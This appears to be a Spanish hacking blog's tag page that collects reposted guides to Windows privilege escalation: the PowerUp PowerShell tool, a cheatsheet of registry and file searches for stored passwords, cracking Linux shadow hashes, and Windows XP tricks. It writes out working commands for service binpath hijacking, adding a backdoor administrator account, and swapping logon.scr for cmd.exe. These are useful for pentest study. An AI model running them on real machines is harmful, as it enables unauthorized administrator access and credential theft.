Banner 1

Mostrando entradas con la etiqueta privilegios. Mostrar todas las entradas
Mostrando entradas con la etiqueta privilegios. Mostrar todas las entradas

Herramienta de pentesting para escalar Privilegios en Windows: PowerUP

0 comentarios
 Bien una vez dicho esto, hoy vengo a presentaros una herramienta de pentesting llamada PowerUp bajo licencia GNU, herramienta de PowerShell para ayudar con la elevación local de privilegios en los sistemas Windows. Dicha herramienta nos permite encontrar métodos y servicios vulnerables y poder abusar de estos,  así como "secuestro" de DLL, configuraciones de registro vulnerables y sobre todo y más importante las posibilades de escalabilidad de privilegios dentro del sistema, la herramienta ha sido desarrollada por @harmj0y , el código de la herramienta esta aquí.
Bien vamos a explicar los distintos métodos de los cuales se compone esta herramienta:
Para probar la herramienta necesitamos el código, el cual se encuentra aquí:


Lo primero que necesitaremos hacer es copiar todo el código en nuestro PowerShell, de la siguiente manera:  


  1. Para los que no sepan como lanzar PowerShell o Instalarlo etc, aqui hay un manual de cómo utilizarlo, solo necesitareis leer de la pg 12 a la 13 para poder seguir esto, aunque os recomiendo que saquéis tiempo para leerlo entero ;-)  
  2. Bien una vez llegados a este punto en el que tengáis el PowerShell lanzado , solo tendremos que copiar todo el código en la consola de PowerShell  tal que así:  
  3. Una vez introducido todo el código de la herramienta podemos empezar a ver los distintos métodos en los que se compone: 


Service Enumeration:

  • Get-ServiceUnquoted: está función encuentra todos los servicios no cotizados, que también tienen un espacio (es decir, el modulo trusted_service_path.rb MSF). Si tienen algun servicio que hace referencia a algo como C:\Herramientas\Herramientas Personalizadas\estacioninformatica.exe, y tiene acceso de escritura al directorio base C:\Herramientas\, dejando caer un ejecutable a C:\Herramientas\herramientas.exe lo podrás ejecutar en ese programa, en vez del servicio original. Esto es debido a la ambigüedad de algunas funciones de la API de windows a las que hace referencia.
  • Get-ServiceEXEPerms: esta función busca todos los servicios en los que el usuario actual tiene permisos de escritura. Si se sustituye uno de estos ejecutables nos permitira secuestrar un servicio actual
  • Get-ServicePerms: esta función enumera todos los servicios disponibles para abrir el servicio
     para su modificación. Podremos cambiar la ruta binaria como por ejemplo
     "net user password backdoor/add" y posteriormente reiniciar el servicio.
     

    Service Abuse:

  • Invoke-ServiceUserAdd: esta función detiene un servicio, lo modifica, lo inicia, lo detiene y a continuación restaura la ruta original exe, es decir, permite abusar de todo lo que se encuentra en "Get-ServicePerms". Podremos detener un servicio, modificarlo para crear un usuario y añadirlo al grupo de administradores locales y reiniciamos el servicio, y se restaura la ruta binaria del servicio original
  • Write-UserAddServiceBinary: esta función toma un precompilado C# ejecutable, servicio y parches binarios con el nombre del servicio, nombre de usuario, contraseña, nombre del grupo para agregar, a continuación,  el binario a la ubicación especificada, es decir, nos permite secuestrar servicios de "Get-ServiceUnquoted", necesitaremos un servicio de C# precompilado y los parches binarios con el nombre del servicio, le metemos el usuario/contraseña y grupo y cuando se ejecute, el binario creara el usuario con los parámetros establecidos.
  • Write-ServiceEXE: esta función invoca "WtireServicePSBinary" reemplaza el binario para el servicio "VulnSVC" por uno que añade un usuario local con contraseña y el grupo administrador, es decir, se puede utilizar para abusar de binarios vulnerables que se encuentren en "GET-ServiceEXEPerms". Respaldaremos el exe para un servicio establecido, después utilizaremos "Write-UserAddServiceBinary" para reemplazar el ejecutable con uno que crea y agrega un administrador local.
  • Restore-ServiceEXE: esta función restaura la copia de seguridad original del archivo por la ruta del servicio manipulado, la cual devolverá true si se realizo correctamente o false en caso contrario. Con Restore-ServiceEXE podremos restaurr el ejecutable original

DLL Hijacking:

  • Invoke-FindDLLHijack: esta función comprueba todos los módulos cargados para cada proceso, y devuelve lugares donde no existe un modulo cargado en la ruta de la base ejecutable, es decir, busca servicios con posibles oportunidades de secuestro dll, si una carpeta de la norma %PATH% tiene permisos de escritura por el usuario actual pe: \Python27, podremos colocar un archivo DLL malicioso en determinados lugares para escalar privilegios.


  • Invoke-FindPathDLLHijack:  esta función comprueba si el PATH actual contiene cualquier directorio con permisos del usuario actual. Si existe, se puede escribir, entonces comprueba la versión de Windows y envía un servicio hijackable para la versión de windows correspondiente.

Registry Checks:

  • Get-RegAlwaysInstallElevated: esta función comprueba si la clave del registro  " AlwaysInstallElevated" está habilitada, es decir,  verificara el registro de windows para la clave AlwaysInstallElevated, si se encuentra habilitada, los instaladores MSI siempre se ejecutaran con privilegios elevados. hay un modulo de Metasploit llamado:  " always_install_elevated.rb" que explota este mismo comportamiento, "Write-UserAddMSI" que escribirá un archivo instalador MSI que cuando se ejecuta, pide una cuenta de usuario para añadir al grupo de administradores locales.
  • Get-RegAutoLogon: esta función comprueba las credenciales de sesión automática en el registro "DefaultUserName/DefaultPassword", es decir, comprobara si se ajusta la clave del registro "AutoAdminLogon", y procederá a sacar las credenciales en texto plano.

Misc. Checks:

  • Get-UnattendedInstallFiles: esta función comprueba ubicaciones de instalaciones desatendidas para obtener un archivo con credenciales de despliegue, es decir, comprobara la existencia de varios archivos desatendidos sobrantes, que suelen tener las credenciales administrativas en texto plano.

Helpers:

  • Invoke-AllChecks: esta función ejecuta todas las funciones que comprueban todas las opciones de escalar privilegios del sistema, es decir, chequeara todo y nos mostrara un informe con las opciones de escalar disponibles.
  • Write-UserAddMSI: esta función escribe un instalador MSI precompilado que solicita usuario/grupo. Esta función se puede utilizar para abusar Get-RegAlwaysInstallElevated.
  • Invoke-ServiceStart: esta función inicia un servicio especificado, permitiendo marcarlo como deshabilitado.
  • Invoke-ServiceStop: esta función para un servicio especificado, el cual nos devolverá verdadero si la función tuvo éxito o falso en caso contrario.
  • Invoke-ServiceEnable: invoca un servicio y lo habilita.
  • Invoke-ServiceDisable: esta función deshabilita/desactiva  un servicio especificado 
  •  Get-ServiceDetails: obtiene información detallada acerca de un servicio



Como podéis observar nos brinda grandes oportunidades y si le damos juego con la herramienta Pyinstaller podremos hacer grandes cosas, bien esta primera entrada es una introducción para poder centrarnos posteriormente detalladamente en cada funcionalidad de dicha herramienta con casos prácticos. Espero que os guste la herramienta y  trasteéis con ella. 
 


Aquí os dejo un libro y un artículo interesantes:
Bien antes de acabar volver a agradecer a @n0ipr0cs esta oportunidad muchas gracias ;-)

Un saludo desde el CPD (^_-)

Fuente: http://www.estacion-informatica.com/2014/05/herramienta-powerup.html

Cheatsheet para el escalado de privilegios en Windows

0 comentarios
En un test de intrusión de una máquina Windows muchas veces conseguimos una consola con un usuario sin privilegios, sobretodo en entornos Citrix o similares. La siguiente tarea en este caso suele ser conseguir acceso como system o con otra cuenta con privilegios de administración o, al menos, más elevados.

Existen multitud de técnicas más o menos efectivas dependiendo los "descuidos" de los administradores, los fallos de configuración, las vulnerabilidades y de lo actualizado que esté el software de la máquina objetivo. Os recomiendo concretamente leeros este artículo de Scott Sutherland y sobretodo esta presentación de insomniasec.com, de la que nuestro amigo Tim Arneaud ha tomado muchas cosas para elaborar un cheatsheet bastante esquemático que a la postre es muy útil y que también queríamos tener a mano.

Esta lista la iremos ampliando según vayamos encontrado nuevas técnicas y funcionalidades. Como siempre, cualquier comentario, sugerencia o feedback son bienvenidos.

------------------------------------------------------------------------------------------------------
Credenciales almacenadas
 
Buscar credenciales dentro de:

c:\unattend.xml

Estas credenciales están almacenadas en base64 y pueden decodificarse fácilmente:

user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=



Módulos de Metasploit Framework:

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb



c:\sysprep.inf

c:\sysprep\sysprep.xml

dir c:\*vnc.ini /s /b

dir c:\*ultravnc.ini /s /b 

dir c:\ /s /b | findstr /si *vnc.ini


findstr /si password *.txt | *.xml | *.ini

findstr /si pass *.txt | *.xml | *.ini


Programas de recuperación de contraseñas - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...

http://www.nirsoft.net/password_recovery_tools.html

Obtener credenciales en texto plano con mimikatz

http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html



------------------------------------------------------------------------------------------------------

Búsquedas en el registro de Windows



VNC:

reg query "HKCU\Software\ORL\WinVNC3\Password"


Windows Autologin:
 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"



Parámetros SNMP:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"



Putty:

reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"



Búsquedas en el registro - portapapeles (opcional)

reg query HKLM /f password /t REG_SZ /s [ |clip]

reg query HKCU /f password /t REG_SZ /s [ |clip]



------------------------------------------------------------------------------------------------------

Aplicaciones GUI inseguras

 
Ejecutándose como SYSTEM que puedan abrir cmd.exe o directorios "ficheros, logs" etc.


------------------------------------------------------------------------------------------------------

Permisos de directorios

cacls

icacls


------------------------------------------------------------------------------------------------------

Herramientas de Sysinternals

Comprobar procesos y aplicaciones que se ejecutan en el inicio con Autoruns y procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027



Servicios apuntando a localizaciones escribibles

*- instalaciones huérfanas - aplicaciones que ya no están instaladas pero que permanecen en el inicio

*- reemplazo de dlls
desconocidas
*- Rutas de directorios con permisos inadecuados - ¿posible sobreescritura?



sysinternals tools

accesschk.exe -uwcqv *



*- procesos inseguros

*- robo de tokens de procesos/threads (incognito)

*- hijack handles for write access



------------------------------------------------------------------------------------------------------

Cambio del binario de servicio upnp

http://lanmaster53.com



sc qc upnphost
sc config upnphost binpath= "net user /add"
sc config upnphost obj= ".\LocalSystem" password =""

net stop upnphost

net start upnphost


Esto puede funciona con otros servicios si los permisos lo permiten

------------------------------------------------------------------------------------------------------
Programas para comprobar vectores de escalado de privilegios en Windows:

1. Windows-privesc-check ( V1 , V2 )

2.
AccessChk

3.
AccessEnum

4.
Windows Permission Identifier

5. Dark Elevator - hxxp://web.archive.org/web/20100817073927/http://root.net.nz/darkelevator.html


------------------------------------------------------------------------------------------------------
Vulnerabilidades de escalado de privilegios



Windows kernel privilege escalation

KiTrap0D 

http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip


Tomcat Windows privilege escalation

http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows


NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3

16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0

http://www.securityfocus.com/bid/46136/exploit

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045

http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c

http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html

http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx


Service Tracing Key (MS10-059)

http://www.securityfocus.com/bid/42269/exploit

http://www.argeniss.com/research/ARGENISS-ADV-081002.txt

http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554


Registry Symlink Vuln (MS10-021)

No Public Exploit - VuPEN membership only


Ryujin - ADF.sys priv esc - ms11-080

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005

http://www.exploit-db.com/exploits/18176

pyinstaller - 
http://www.pyinstaller.org/
py2exe - 
http://www.py2exe.org/

UAC Bypass priv esc

http://www.exploit-db.com/exploits/15609

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398

http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx

http://www.securityfocus.com/bid/45045/info



Referencias adicionales, fuentes y otros enlaces:

Encyclopaedia of Windows Privilege escalation - Brett Moor

http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/
FUENTE:http://www.hackplayers.com/2012/08/cheatsheetescaladoprivilegioswindows.html 

Escalada de Privilegios en Joomla a través de un Registro

0 comentarios
Bueno , En este video tutorial explico como realizar una escalada de privilegios a webs joomla con versiones 1.6 , 1.7 y 2.5 mediante un registro.


Saludos , Sanko
Fuente:http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/

escalar privilegios DESDE WINDOWS (brute force)

0 comentarios

Este método se basa en un ataque de fuerza bruta a los hashes de las contraseñas, por lo que el factor "suerte" juega un papel importante, lo ideal es seguir uno de los métodos de arriba

1. Descargar driver para ver particiones ext2 y ext3, el programa se llama "ext2fs" y se descarga de aqui: http://sourceforge.net/projects/ext2fsd

2. Copiar los ficheros /etc/passwd y /etc/shadow a una carpeta de Windows, estos ficheros contienen los hashes de las contraseñas de los usuarios

3. Ahora necesitaremos aplicarle fuerza bruta a estos ficheros, para ello utilizaremos un programa llamado john the ripper: Descargar el programa "john the ripper" de aqui: http://www.openwall.com/john/

4. Nos documentamos en internet sobre como usar los comandos del john the ripper; Básicamente usaremos los siguientes comandos en este orden:

  • unshadow (para fusionar el fichero passwd con shadow, esto es necesario para poder empezar a crackear las contraseñas)
  • single, incremental etcétera (para realizar distintos ataques de fuerza bruta)
  • show (para ver las contraseñas ya crackeadas)

Escalar Privilegios en Windows XP

0 comentarios
Elevando privilegios en máquinas con Windows XP


En este pequeño manual explicaré unas cuantas formas para llevar a cabo una tarea muy codiciada por muchos: elevar sus privilegios en una máquina con Windows XP. Básicamente nos centraremos en este sistema operativo de la casa Microsoft, puesto que actualmente es su ultimo sistema operativo y es uno de los mas utilizados hoy en día.
Por otra parte los sistemas 9x, ME, NT y 2000 están ya un tanto desfasados (principalmente los 3 primeros) y no creo necesario detallar nada acerca de dichos sistemas, sería, en cierto modo, una perdida de tiempo, aunque algunas de las técnicas aquí explicadas serían aplicables a un Windows 2000 por ejemplo.
He considerado oportuno escribir este pequeño manual, en cierto modo para relatar uno de los métodos que yo utilicé en una ocasión, y además, en caso de que no funcionara, tener otros métodos como posibles alternativas válidas.
Cabe destacar que los métodos aquí explicados funcionan en la mayoría de los casos, aunque a veces te funcionará un método en concreto y otro no, de ahí la razón por la cuál explico varios. Una última puntualización a destacar antes de pasar a la acción, es que en sistemas “capados” resultará muy difícil elevar tus privilegios, se puede decir que es casi imposible, auque como creo que sabéis en este mundo no hay nada imposible. De todos modos podéis probarlo, pasemos a la acción.
A continuación, numeraré y explicaré uno por uno los distintos métodos de elevación de privilegios que podemos hacer en una maquina con Windows XP, vamos allá.

Elevación de privilegios mediante el exploit GETAD2


Este tipo de elevación es muy sencilla de explicar, básicamente pasaremos de ser un usuario restringido del sistema, invitado o cualquier otro “rol” sin privilegios, a formar parte del grupo de administradores del sistema en cuestión.
Para ello, usaremos el exploit GETAD2, que en mis pruebas es capaz de elevar privilegios en un Windows 2000 en cualquiera de sus subsistemas con un sp3 y en un Windows XP Home//Profesional con un sp1.
En primer lugar nos tendremos que hacer con dicho exploit; si bien consigues el GETAD2.exe estas de suerte, lo más lógico es que lo encuentres como GETAD2.c y lo debas compilar, por ejemplo usa el Visual C++ o bien el Dev C++.
Una vez tengas el archivo ejecutable arranca la maquina con la cuenta que te hayan asignado y entra en el sistema. Ahora viene el momento cumbre de este “hack”, lograr ejecutar el exploit con éxito, es aquí donde vienen los problemas. Para ejecutar el exploit, deberás hacerlo en la consola de sistema (cmd.exe) y se puede dar el caso que no tengas acceso a ella, o bien que tu cuenta no tenga permisos de escritura o mil historias (en el peor de los casos si el Windows XP está “capado” olvídate de este método).
Si en el terminal que estés puedes introducir disquetes estarás de suerte, puesto que lo copias en el disquete y de ahí enviarlo a la carpeta temporal (donde lo mas probable es que tengas permisos de escritura), incluso pueden que te hayan hecho un subdirectorio específico para tu cuenta donde también cuentes con dichos permisos. Si lo bajas de Internet lo mismo, compilas y a la carpeta temporal.
Para ejecutarlo puedes probar lo típico, ejecutar cmd.exe, command.com, buscarlo en C: (si es que puedes) etc. Otras opciones serían crearte un archivo *.bat que llame a la consola de sistema, o bien copiártelo en un disquete y ejecutarlo en la maquina. Por último también lo podrías bajar de Internet (otro programa que abra una interfaz de comandos) o bien utilizar los denominados "GUI cmd", que básicamente son consolas de sistema (cmd.exe) que tienen interfaz gráfica con la apariencia de una página web del correo de hotmail, así si algún capullo pasa por delante de ti, pensará que estás leyendo tu correo, cuando en realidad estás delante de la shell del sistema.





Para acabar con este apartado, aquí tienes los pasos a seguir, una vez obtenido el exploit y la consola de sistema:

C:\>GETAD2.exe à Ejecutar el exploit. Acto seguido se nos abrirá una ventana shell de sistema.

C:\Windows\System32> à Acto seguido realizaremos la elevación de privilegios; ejecutaremos los siguientes comandos:

C:\Windows\System32\> net user XfjXt 123456 /add àEste comando crea una nueva cuenta de usuario, su login es XfjXt y su password es 123456.

C:\Windows\System32\>net localgroup “administradores” XfjXt /add à Este comando añade al grupo de administradores locales del sistema al usuario XfjXt. Conlleva que XfjXt conserva el mismo password.

Bueno ya eres administrador del sistema, puedes hacer lo que te venga en gana (cosa que no veo bien).

Por ultimo solo nos queda reiniciar la maquina y entrar con nuestro login y nuestro password. Ahora tendremos privilegios de administrador local del sistema en cuestión.

Tan solo avisar que puede que al ejecutar el exploit el sistema se vuelva realmente inestable, de hecho puede llegar a tirar abajo el sistema y reiniciarse solo. En todo caso cuando esto pase nos logeamos con nuestro login y password y punto.


Elevación de privilegios mediante el protector de pantalla de Windows XP

Éste método consta principalmente de “crearnos” una shell con permisos de sistema aprovechando un pequeño despiste de los chicos de Microsoft.
Se basa en la modificación de ficheros, tal que en lugar de ver el protector de pantalla, se nos ejecutará la consola de sistema (cmd.exe).
Una vez arrancada la maquina y con algún método de los antes explicados de acceder al cmd.exe, te sitúas en la carpeta:

C:\Windows\System32

Ahora realizamos un “dir” y observaremos un fichero llamado logon.scr, que es el protector de pantalla que se ejecuta si tardamos entre 15 o 20 minutos antes de entrar en el sistema como usuario alguno. Es gracias a este “fallo” mediante el cual nos vamos a hacer con la shell de sistema.

A continuación, deberemos hacer una copia de seguridad de dicho archivo, puesto que lo vamos a eliminar del sistema para llevar a cabo nuestro propósito, dicho esto, nos crearemos un directorio en tu espacio de disco duro personal, si es que tienes, o bien en la carpeta Temp. de sistema, puesto que probablemente como he dicho antes tengas permiso de escritura. Aquí resumo el algoritmo a seguir en la consola de sistema:

1.- Ejecutamos: mkdir nombredecarpetaquemedelagana...
2.- Trasladar fichero original: copy logon.scr c:\carpeta...\logon.scr
3.- Trasladar fichero shell: copy cmd.exe c:\carpeta...\cmd.exe
4.- Eliminar fichero original: del logon.scr
5.- Reemplazar ficheros para llevar a cabo este “hack”:
rename cmd.exe logon.scr
6.- Salir de la consola de sistema: exit

Bueno pues ya esta, solo queda reiniciar la máquina y esperar entre 10 y 20 minutos (sin entrar en Windows), dependiendo de la máquina en cuestión, y en vez de aparecer el protector de pantalla, nos saldrá la shell de sistema, en la cuál podremos ejecutar el comando que nos de la gana.
Una vez dentro, cada cuál sabrá que camino elegir.

Elevación de privilegios mediante la consola de recuperación de sistema a través de Windows 2000


Bueno a partir de éste método, la cosa se pone un poco más fácil, ya que no nos tendremos que hacer con ningún fichero, ni tener permisos de ningún tipo ni nada por el estilo, por otro lado, en máquinas que no deja acceder al BIOS o sistemas con cargadores de arranque (Windows conviviendo con Linux) o sistema “capados” ya citados anteriormente, resultara casi imposible efectuar esta operación.
Solo necesitaremos un cd-rom de instalación de un Windows 2000 Pro, y que nos dejen arrancar desde la unidad D: (si es la que pertenece al lector de cd-rom). Todo ello se realiza desde el BIOS indicando a la opción Boot Sequence que en su orden de prioridad permita arrancar primero a la unidad lectora.
Una vez realizado esto, y arrancado el cd-rom. Se nos presenta la pantalla de instalación de Windows 2000 (aunque en el disco duro este instalado Windows XP). Una vez allá, seleccionaremos la opción “iniciar la consola de reparación”.
Como podréis comprobar vosotros solitos, una vez hecho esto, accederemos a la shell de sistema sin necesidad de introducir ningún password, que es lo que hubiera sucedido si hubiéramos usado el cd de instalación de Windows XP.
A partir de aquí, tenemos acceso ilimitado a la máquina en cuestión, y como ya he mencionado anteriormente, cada cuál es libre para hacer lo que le venga en gana.

Bueno, los 3 principales métodos de elevación de privilegios han quedado explicados, espero que se entiendan y sirvan para conseguir dicho objetivo.

Recalcar que existen un par de métodos más, aunque si bien no, poco efectivos, e incluso algunos ineficientes (explicados en otros textos y comprobados por mi), incluso otros que no ha hecho falta ni comprobarlos, puesto que la evidencia supera la explicación.

Como ya dije al principio, quizás os sirvan los 3 métodos, quizás 2 o solo 1, incluso puede que ninguno, esto es en sistema “capados” y/o bien protegidos. Son, por lo tanto, los 3 métodos que mas posibilidades tienen de realizar con éxito la tarea, así pues, una vez más, espero que os ayuden.

Para finalizar, como en toda guía orientada al mundo del hacking, no me hago responsable del uso que se le de a esta guía, puesto que tan solo se trata y se investiga uno de los muchos aspectos de Windows XP referentes a la seguridad, y en ningún caso se incita a burlar la seguridad de dicho sistema. El estudio e investigación, así como la curiosidad no son delitos... aún.

Fuente: http://www.laelitehacker.com/Hacker-Forums_-_file_-_viewtopic_-_t_-_23.html

Escalar Privilegios en Windows XP

0 comentarios
Se te ha presentado la situación donde pierdes la cuenta de administrador y tienes que loguearte como usuario limitado, pero no puedes hacer nada por obvias razones. Pues hoy veremos como escalar privilegios para tener control de una cuenta administrativa (?? hay que ser muuy pero muuy descuidado para perder la cuenta de administrador).

Solo necesitamos acceos a la consola de comandos para poder realizar este ejercicio. Los pasos son los siguientes:
  • Entrar a la consola de comando. Inicio --> Ejecutar ---> escribir "cmd" + Tecla Enter
  • Escribir at 17:41 /interactive "cmd.exe" (donde la hora es un minuto mas que la hora actual de su ordenador, asi mismo las comillas tambien se escriben) ejemplo y presionas la tecla enter
  • Al llegar el reloj de su ordenador a la hora que señalarón, aparecera una nueva consola de comando con la cuenta de system o sistema como aparece en este ejemplo
  • Matamos el proceso del nuestro explorer actual (el de la cuenta limitada) escribiendo lo siguiente taskkill /F /IM explorer.exe presionamos Enter.
  • Ahora, por último, iniciamos el proceso del explorador que se reconocera como administrador del equipo, es decir la cuenta system que cuenta con esos privilegios. Esto se hace escribiendo explorer.exe y presionamos Enter
Listo ya tenemos una cuenta administrativa, ahora a recuperar nuestra contraseña perdida xD

Fuente: http://ktheruler.blogspot.com/2008/05/escalar-privilegios-en-windows-xp.html
Powered by Bad Robot
Helped by Blackubay